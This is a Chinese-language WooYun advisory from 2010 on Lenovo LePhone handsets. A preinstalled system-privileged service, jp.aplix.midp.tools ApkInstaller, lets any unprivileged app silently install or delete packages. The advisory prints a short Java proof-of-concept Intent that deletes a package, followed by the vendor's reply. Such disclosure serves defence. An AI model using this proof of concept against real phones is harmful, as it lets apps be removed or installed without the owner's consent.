当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0509

漏洞标题:乐phone手机任意软件包安装删除漏洞

相关厂商:联想

漏洞作者: rayxcp

提交时间:2010-09-08 16:22

修复时间:2010-09-13 18:00

公开时间:2010-09-13 18:00

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-09-08: 细节已通知厂商并且等待厂商处理中
2010-09-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

乐phone手机默认包含一个服务,其设计没有遵照Android安全规范,导致没有声明任何权限的应用即可在没有任何提示情况下通过该服务安装和删除任意软件包,对系统安全性产生极大影响。

详细说明:

乐phone手机出厂默认包含一个名为jp.aplix.midp.tools的应用包。本应用以system权限运行,并向其他应用提供ApkInstaller服务,用来进行对Apk文件的安装和删除。通过向ApkInstaller服务传递构造好的参数,没有声明任何权限的应用即可达到安装和删除任意Package的行为,对系统安全性产生极大影响。

漏洞证明:

PoC:

Intent in = new Intent();
in.setComponent(new ComponentName("jp.aplix.midp.tools","jp.aplix.midp.tools.ApkInstaller"));
in.putExtra("action", "deleteApk");
in.putExtra("pkgName", "xxxxx");
startService(in);

修复方案:

理解并使用Android permission机制

版权声明:转载请注明来源 rayxcp@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2010-09-13 18:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2011-05-05:这个问题以前跟踪过,由于我们LEOS2.0之前的版本没有更换android自带的平台证书,导致任意一个第三方合作伙伴的包都可以system ID运行并执行高风险权限(如安装和卸载软件包),这个问题已在LEOS2.0以后的版本解决。另外,对于这个三方合作伙伴的包:jp.aplix.midp.tools,我们已要求第三方更改实现方式,应该已经解决了这个问题。感谢关注联想产品和服务的安全!